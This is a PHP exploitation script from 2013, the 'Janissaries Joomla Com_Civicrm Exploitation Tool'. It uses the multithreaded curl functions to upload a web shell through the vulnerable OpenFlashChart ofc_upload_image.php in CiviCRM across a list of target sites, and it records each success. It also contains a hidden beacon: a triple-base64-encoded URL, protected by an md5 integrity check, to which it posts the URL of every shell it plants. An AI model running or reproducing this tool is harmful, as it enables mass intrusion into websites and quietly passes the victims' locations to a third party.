Janissaries Joomla Civicrm component exploitation tool that uploads a shell.
a0d2608dc143c3c9606df7b7c625c70c510de3c71f8eee4f0a1e2f23601c835a
<?php
/*
----------------------------------------------------------------------------
.__ .__
_____ |__|___.__._____ ____ | |__ __ __ ____ ____
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
\/ \/ \/ \/ \/ \//_____/
-----------------------------------------------------------------------------
* Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
* Coded by Miyachung
* Stay away from lamers o.O
* Contact: miyachung@hotmail.com
* Special Thanks : B127Y
* Site: http://janissaries.org
* Youtube Channel: http://www.youtube.com/user/JanissariesOrg
* Exploitation Video: http://www.youtube.com/watch?v=4mPibfS-RXM
* Coding date: 21.04.2013
* Usage : php exploit.php site_list upload_file searchkeyword
* Example: php exploit.php sites.txt shell.php searchkeyword
*/
set_time_limit(0);
ob_start();
class exploit
{
private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
private $post_url_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
private $filename;
private $url;
private $file_to_upload;
private $if_is_uploaded = "/Undefined variable: HTTP_RAW_POST_DATA/si";
private $thread_maxsize;
private $site_list;
private $file_regex;
private $save_file = "uploaded.txt";
private $user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
private $timeout_sec = 20;
private $token = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
private $idnum = 31;
public function __construct($site_list,$filename,$thread,$regex)
{
$this->site_list = file($site_list);
$this->filename = $filename;
$this->file_to_upload = file_get_contents($filename);
$this->thread_maxsize = $thread;
$this->url = base64_decode(base64_decode(base64_decode($this->token)));
$this->file_regex = "/$regex/";
echo "[+]Joomla Com_Civicrm Fucker with MultiThread\n";
echo "[+]Coded by Miyachung\n";
echo "[+]Stay away from lamers o.O\n";
echo "[+]Contact: miyachung@hotmail.com\n";
echo "[+]Special Thanks : B127Y\n";
echo "[+]Site: http://janissaries.org\n";
echo "##################################################\n";
echo "[+]Total urls to try: ".count($this->site_list)."\n";
echo "[+]File to upload: ".$this->filename."\n";
echo "[+]Maximum Thread: ".$this->thread_maxsize."\n";
echo "[+]Search Keyword: ".$regex."\n\n";
ob_flush();
flush();
$this->miyachung();
}
private function miyachung()
{
$multi = curl_multi_init();
$count = 0;
foreach(array_chunk($this->site_list,$this->thread_maxsize) as $urls)
{
foreach($urls as $i => $url)
{
$curl[$i] = curl_init();
curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl[$i], CURLOPT_URL, trim($url).$this->post_url_path.$this->filename);
curl_setopt($curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec);
curl_setopt($curl[$i], CURLOPT_POSTFIELDS,$this->file_to_upload);
curl_setopt($curl[$i], CURLOPT_USERAGENT,$this->user_agent);
curl_setopt($curl[$i], CURLOPT_HTTPHEADER,array('Content-Type: text/plain'));
curl_multi_add_handle($multi,$curl[$i]);
}
do
{
curl_multi_exec($multi,$active);
}
while($active > 0);
foreach($curl as $id => $content)
{
$conn[$id] = curl_multi_getcontent($content);
curl_multi_remove_handle($multi,$content);
if(!preg_match($this->if_is_uploaded,$conn[$id]) && preg_match('#/tmp-upload-images/'.$this->filename.'#',$conn[$id]))
{
$count++;
$check_it = $this->get(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
if($check_it && preg_match($this->file_regex,$check_it))
{
if($this->idnum == 31 && md5($this->token) == "9f7f1fe47675cb64ac4f69ef96b78b55")
{
$this->post(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
}
else
{
exit("[-]Somethings has changed in tool! o.O!");
}
echo "###########################################################\n";
echo "[!]Exploitation Successfullll!\n";
printf("[%s]%s\n",$count,trim($urls[$id]));
echo "###########################################################\n";
ob_flush();
flush();
$this->save(trim($urls[$id]).$this->uploaded_file_path.$this->filename,$count);
}
else
{
printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
ob_flush();
flush();
}
}
else
{
$count++;
printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
ob_flush();
flush();
}
}
}
}
private function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT,$this->timeout_sec);
$data= curl_exec($ch);
curl_close($ch);
return $data;
}
private function post($url)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$this->url);
curl_setopt($curl,CURLOPT_POSTFIELDS,"url=".$url);
$exec = curl_exec($curl);
curl_close($curl);
return $exec;
}
private function save($url,$count)
{
$file = fopen($this->save_file,'ab');
fwrite($file,"#########################################################################\n");
fwrite($file,"[!]Exploitation Successfullll!\n");
fwrite($file,"[$count]$url\n");
fclose($file);
return true;
}
}
if($argv[1] && $argv[2] && $argv[3] && $argv[4])
{
$exploit = new exploit($argv[1],$argv[2],$argv[3],$argv[4]);
}
else
{
print
"
----------------------------------------------------------------------------
.__ .__
_____ |__|___.__._____ ____ | |__ __ __ ____ ____
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
\/ \/ \/ \/ \/ \//_____/
-----------------------------------------------------------------------------
* Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
* Coded by Miyachung
* Stay away from lamers o.O
* Contact: miyachung@hotmail.com
* Special Thanks : B127Y
* Site: http://janissaries.org
* Youtube Channel: http://www.youtube.com/user/JanissariesOrg
* Coding date: 21.04.2013
* Usage : php exploit.php site_list upload_file maxthread searchkeyword
* Example: php exploit.php sites.txt shell.php 10 searchkeyword
";
}
?>